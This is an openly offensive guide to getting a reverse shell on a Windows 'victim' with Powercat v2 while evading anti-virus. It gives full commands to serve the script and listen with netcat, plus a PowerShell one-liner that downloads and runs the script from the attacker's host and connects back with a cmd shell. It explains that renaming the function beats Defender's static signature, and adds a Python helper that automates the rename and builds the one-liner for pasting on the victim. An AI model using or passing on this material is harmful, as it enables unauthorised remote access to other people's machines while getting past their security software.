
Powercat-v2.0 Reverseshell Guide

A guide to evade the boys in blue when acquiring a reverse shell on Windows using Powercat v2

About this Guide

This guide shows how to obtain a reverse shell on a Windows machine with a single PowerShell script while getting past the anti-virus software installed on it.

Powercat is essentially the PowerShell version of netcat. It is a network utility for low-privilege network communication that relies only on components available in PowerShell version 2 and later, so it needs no third-party modules on the target.

Usage

Clone this repository and change the working directory

git clone https://github.com/rexpository/powercat-v2.0.git
cd powercat-v2.0

Start a Python HTTP server on a port of your choice (e.g., 70) so the victim can fetch the script. The command below is the Python 2 form; on Python 3 the equivalent module is http.server. Ports below 1024 (such as 70) can only be bound as root.

python -m SimpleHTTPServer 70

Start a Netcat listener on a port of your choice (e.g., 5555) for obtaining a reverse connection

sudo apt-get install netcat
nc -lp 5555

On your Windows victim machine, run the following PowerShell command from the command prompt (CMD). Because the script is downloaded as a string and passed to IEX rather than run as a .ps1 file, the PowerShell execution policy does not block it.

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://YOURIP:70/powercat.ps1');powerrcatt -c YOURIP -p 5555 -e cmd"

Note: YOURIP should be your host's local IP address (Linux IP address); make sure to replace ports 70 and 5555 in the command with your own configurations.

Once the command runs, a shell appears in the Netcat listener. It runs as the account that launched the command; use whoami to check which user (and, with whoami /groups, which privilege level) you have.

Evading Anti-virus

If Windows Defender or other anti-virus software flags the script as malware, the detection is often a static signature on the function name. For the time being, renaming the powerrcatt function is enough to defeat that signature. Keep in mind what this does and does not change: the script body, the download cradle (IEX plus DownloadString) and the network behaviour are untouched, and on PowerShell 5 and later AMSI passes the downloaded script text to the installed anti-virus at execution time, so a signature on any other string in the script will still fire.

Open up powercat.ps1 with your favorite text editor and change the name of the function powerrcatt to whatever you would like (e.g., powerrrrcat). Make sure you change every occurrence of the name, not just the declaration.

Original script:

function powerrcatt
{
  param(
    [alias("Client")][string]$c="",
    [alias("Listen")][switch]$l=$False,
    ...

Updated script:

function powerrrrcat
{
  param(
    [alias("Client")][string]$c="",
    [alias("Listen")][switch]$l=$False,
    ...

Make sure that you update the powershell command from earlier to reflect these changes:

Original command:

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://YOURIP:70/powercat.ps1');powerrcatt -c YOURIP -p 5555 -e cmd"

Updated command:

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://YOURIP:70/powercat.ps1');powerrrrcat -c YOURIP -p 5555 -e cmd"
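The procedure above (stage the script, rename the function, build the matching one-liner) and the reason the rename works are easy to get wrong by hand, so here is an added helper that automates it. This is example code written for this guide, not part of the powercat-v2.0 repository. It assumes the function can be found with a regex on "function <name>", uses a constructed stand-in for the top of powercat.ps1, and models anti-virus detection as a toy set of string signatures (one on the function name, one on behaviour) rather than Defender's real logic.

```python
"""Stage a renamed powercat.ps1 and show what the rename does and does not hide.

Added example for this guide; not part of the powercat-v2.0 repository.
Assumptions (not from the original page): the function is located with a
regex on 'function <name>', the one-liner is assembled from the same
parameters the guide uses, and the "signatures" below are a toy model of a
string-based AV rule, not Windows Defender's actual detection logic.
"""
import re
import secrets
import string

# Constructed stand-in for the top of powercat.ps1 (only the part the guide shows,
# plus one line of the kind of network call the real script contains).
SAMPLE_SCRIPT = """function powerrcatt
{
  param(
    [alias("Client")][string]$c="",
    [alias("Listen")][switch]$l=$False,
    [alias("Port")][string]$p="",
    [alias("Execute")][string]$e=""
  )
  $Socket = New-Object System.Net.Sockets.TcpClient($c, $p)
}
"""

FUNC_RE = re.compile(r"^(\s*function\s+)(\w+)", re.MULTILINE)


def current_function_name(script: str) -> str:
    """Return the first 'function <name>' declared in the script."""
    m = FUNC_RE.search(script)
    if not m:
        raise ValueError("no function declaration found")
    return m.group(2)


def random_name(length: int = 12) -> str:
    """Letters only, so the result is always a valid PowerShell identifier."""
    return "".join(secrets.choice(string.ascii_lowercase) for _ in range(length))


def rename_function(script: str, new_name: str) -> str:
    """Rename every whole-word occurrence of the declared function (the guide's evasion step)."""
    old = current_function_name(script)
    return re.sub(rf"\b{re.escape(old)}\b", new_name, script)


def build_cradle(host: str, http_port: int, nc_port: int, func: str) -> str:
    """The guide's download-and-execute one-liner with the renamed function substituted."""
    url = f"http://{host}:{http_port}/powercat.ps1"
    return (f'powershell -c "IEX(New-Object System.Net.WebClient).DownloadString(\'{url}\');'
            f'{func} -c {host} -p {nc_port} -e cmd"')


def stage(script: str, host: str, http_port: int, nc_port: int, new_name: str = None):
    """Return (renamed script, matching one-liner); picks a random name if none is given."""
    new_name = new_name or random_name()
    return rename_function(script, new_name), build_cradle(host, http_port, nc_port, new_name)


# Toy signatures (hypothetical): one keyed on the function name, one on behaviour.
NAME_SIGNATURE = "powerrcatt"
BEHAVIOUR_SIGNATURES = ("System.Net.Sockets.TcpClient", "DownloadString", "IEX(")


def matches(signatures, *texts) -> list:
    """Return which toy signatures appear in any of the given texts."""
    return [s for s in signatures if any(s in t for t in texts)]


if __name__ == "__main__":
    renamed, cradle = stage(SAMPLE_SCRIPT, "YOURIP", 70, 5555)
    print(renamed)
    print(cradle)
    print("name signature hits:", matches([NAME_SIGNATURE], renamed, cradle))
    print("behaviour signature hits:", matches(BEHAVIOUR_SIGNATURES, renamed, cradle))
```

Run it with the real powercat.ps1 read from disk in place of SAMPLE_SCRIPT, write the renamed script back to the directory your HTTP server serves, and paste the printed one-liner on the victim. The two final lines make the point of the previous section concrete: after the rename the name-based signature finds nothing, while every behaviour-based indicator is still present in both the script and the command.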

Credits
